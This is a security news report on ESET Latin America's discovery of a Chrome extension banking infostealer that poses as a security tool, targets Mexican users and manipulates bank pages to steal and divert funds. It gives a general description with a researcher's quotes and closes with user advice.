A. M. 
ESET Latin America has detected a malicious Chrome extension that pretends to be a security tool. It steals banking data and can enter account and virtual wallet information controlled by cybercriminals, enabling the misappropriation of funds.
The ESET Latin America Research Lab, a leading company in proactive threat detection, has identified malicious code that affects Windows operating systems and masquerades as a security extension for Google Chrome. Detected by ESET solutions as JS/Spy.Banker.CV, it is an infostealer capable of stealing sensitive information.
This malware spreads in the region, primarily through Mexico, through compressed attachments in emails that appear to be from recognized financial institutions. Its code includes words, variable names, and replacements in Portuguese, demonstrating that this type of threat transcends borders.
This threat can visually modify the page by detecting when the user is on a financial page—finding common patterns on these types of sites—and when it does, it can modify the DOM (Document Object Model), changing how the page looks and functions without the user noticing. In this way, it presents fake forms that look like real ones. All information entered these forms is redirected to a server controlled by the cybercriminals.
Furthermore, this malware can replace the user’s cryptocurrency wallet and banking information with that of the cybercriminals, which would enable the diversion of funds to the attackers.
“We are dealing with an infostealer capable of stealing sensitive information from a victim when they fill out a form on a website. With the ability to modify the victim’s wallet and other payment information, it clearly demonstrates that cybercriminals are seeking financial gain. This threat transcends borders and exploits the reputation of financial institutions throughout the region”, says Mario Micucci, IT Security researcher at ESET Latin America.
During the analysis phase, the ESET team observed that this sample spreads in Mexico via compressed email attachments. They also found two JavaScript files within the malicious extension capable of stealing sensitive data, visually manipulating websites, and exfiltrating information to Command and Control (C2) servers.
An analysis of the file identified visual manipulation of banking sites. ESET found common patterns on pages related to banks or payments, such as “CPF”, “CNPJ”, and “value”, that modify the DOM to deceive the user. This includes replacing real data with attacker-controlled data. For example, it runs on the page’s <body> content, searching for text patterns related to bank deposits (“deposit,” “CPF,” “value”). If it detects that the page contains terms such as “deposit,” “CPF/CNPJ”, and “value” (likely part of “value”), it proceeds to inject malicious logic.
“During the analysis, we noticed that the malicious Google Chrome internet extension persists on the victim machine. The samples containing the extension operate synchronously. While one collects sensitive data, the other manipulates the user’s visual environment to mislead or divert transfers. All interactions are channeled to common malicious domains. It is important to mention that this persistence affects the affected browser; specifically, the malware will execute every time the victim uses it”, explains Micucci of ESET Latin America.
The use of advanced visual manipulation capabilities, primarily targeting users in financial environments, as well as its modular architecture and evasion techniques, require the implementation of specific measures to detect it. ESET reminds us that it is very important to verify the extensions installed on systems and that the sources are trustworthy before installing any application.
Read also:
